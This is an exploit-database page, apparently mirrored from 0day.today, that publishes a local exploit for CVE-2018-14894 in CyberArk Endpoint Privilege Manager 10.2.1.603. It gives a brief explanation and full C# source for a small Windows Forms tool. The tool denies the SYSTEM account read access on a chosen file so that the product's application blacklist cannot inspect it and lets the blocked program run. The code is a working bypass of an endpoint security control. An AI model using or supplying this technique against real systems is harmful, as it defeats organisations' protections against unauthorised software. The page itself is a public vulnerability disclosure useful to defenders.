Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtAlpcan Onaran1337DAY-ID-32530
HistoryApr 12, 2019 - 12:00 a.m.

CyberArk EPM 10.2.1.603 - Security Restrictions #Bypass Exploit

2019-04-1200:00:00
Alpcan Onaran
0day.today
138

EPSS

0.002

Percentile

55.2%

JSON

Exploit for windows platform in category local exploits

# Exploit Title: CyberArk Endpoint bypass 
# Exploit Author: Alpcan Onaran
# Vendor Homepage: https://www.cyberark.com
# Software Link: -
# Version: 10.2.1.603
# Tested on: Windows 10
# CVE : CVE-2018-14894

//If user needs admin privileges, CyberArk gives the admin token to user for spesific process not for the whole system. It is cool idea.
//This product also has a function called β€œApplication Blacklist”. You probably know what that means.
//It helps you to block to execute specified application by CyberArk admin. In normal cases, you can not be able to start this process even with admin rights.
//But We found very interesting trick to make CyberArk blind completely.All you need to do, revoke read privileges for system on the file that you want to open it.
//After you do that, CyberArk EPM can not be able to get information about your blocked file and it just let them execute

This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System;
using System.IO;
using System.Security.AccessControl;

namespace raceagainstthesystem
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void btn_change_access_control_Click(object sender, EventArgs e)
        {
            string fileName = txt_filepath.Text;
            FileSecurity fSecurity = File.GetAccessControl(fileName);
            fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Deny));
            File.SetAccessControl(fileName, fSecurity);

            /*
            fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Allow));
            */

            File.SetAccessControl(fileName, fSecurity);
        }

        private void btn_choseFile_Click(object sender, System.EventArgs e)
        {
            OpenFileDialog choofdlog = new OpenFileDialog();
            choofdlog.Filter = "All Files (*.*)|*.*";
            choofdlog.FilterIndex = 1;
            choofdlog.Multiselect = true;

            string sFileName = "";

            if (choofdlog.ShowDialog() == DialogResult.OK)
            {
                sFileName = choofdlog.FileName;
                string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true           
            }
            txt_filepath.Text = sFileName;
        }
    }
}

#  0day.today [2019-04-12]  #

Related

nvd 1
cve 1
packetstorm 1
exploitpack 1
prion 1
cvelist 1
exploitdb 1
nvd
nvd
CVE-2018-14894
2019-04-09 18:29:00
cve
cve
CVE-2018-14894
2019-04-09 18:29:00
packetstorm
packetstorm
CyberArk EPM 10.2.1.603 Security Restrictions Bypass
2019-04-12 00:00:00
exploitpack
exploitpack
CyberArk EPM 10.2.1.603 - Security Restrictions Bypass
2019-04-12 00:00:00
prion
prion
Design/Logic Flaw
2019-04-09 18:29:00
cvelist
cvelist
CVE-2018-14894
2019-04-09 17:27:16
exploitdb
exploitdb
CyberArk EPM 10.2.1.603 - Security Restrictions Bypass
2019-04-12 00:00:00

EPSS

0.002

Percentile

55.2%

JSON
Related for 1337DAY-ID-32530
nvd1cve1packetstorm1exploitpack1prion1cvelist1exploitdb1